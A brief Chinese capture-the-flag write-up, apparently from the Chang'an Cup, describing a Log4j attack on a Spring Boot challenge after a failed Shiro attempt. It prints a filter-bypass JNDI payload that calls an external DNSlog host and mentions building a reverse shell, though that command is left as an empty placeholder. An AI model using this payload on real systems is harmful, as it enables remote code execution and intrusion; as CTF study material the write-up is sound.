长安杯-shiro?复现
浏览器显示是springboot框架
登录伪造shiro,关键词为remeber-me
shiro直接打,打不进去
springboot还可以写log4j漏洞,测试一下
jndi被过滤了
进行绕过
${${::-j}ndi:rmi://py2hu7.ceye.io/exp}
成功接收到dnslog信息。
构建jndi反弹shell,这里反弹shell的命令需要bypass一下
在这里插入代码片
反弹的有点慢,但是可以成功反弹shell并拿取flag。